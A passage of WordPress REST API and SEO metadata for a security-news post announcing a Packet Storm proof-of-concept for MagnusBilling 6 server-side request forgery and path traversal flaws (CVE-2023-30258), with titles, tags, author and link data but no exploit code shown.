redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \/ Path Traversal_PACKETSTORM:213297 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=32692","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \/ Path Traversal_PACKETSTORM:213297 - zero redgem","og_description":"{“lastseen”:”2025-12-24T16:33:56″,”description”:”Proof of concept exploit for MagnusBilling 6 vulnerabilities including server-side request forgery, path traversal, and cryptographic weaknesses…”,”published”:”2025-12-24T00:00:00″,”modified”:”2025-12-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \/ Path Traversal”,”source”:””,”references”:””,”id”:”PACKETSTORM:213297″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-30258″],”sourceData”:”=============================================================================================================================================n...","og_url":"https:\/\/zero.redgem.net\/?p=32692","og_site_name":"zero redgem","article_published_time":"2025-12-24T11:45:17+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"15 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=32692#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=32692"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \/ Path Traversal_PACKETSTORM:213297","datePublished":"2025-12-24T11:45:17+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=32692"},"wordCount":2992,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=32692#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=32692","url":"https:\/\/zero.redgem.net\/?p=32692","name":"\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \/ Path Traversal_PACKETSTORM:213297 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-24T11:45:17+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=32692#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=32692"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=32692#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \/ Path Traversal_PACKETSTORM:213297"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32692","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=32692"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32692\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=32692"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=32692"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=32692"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}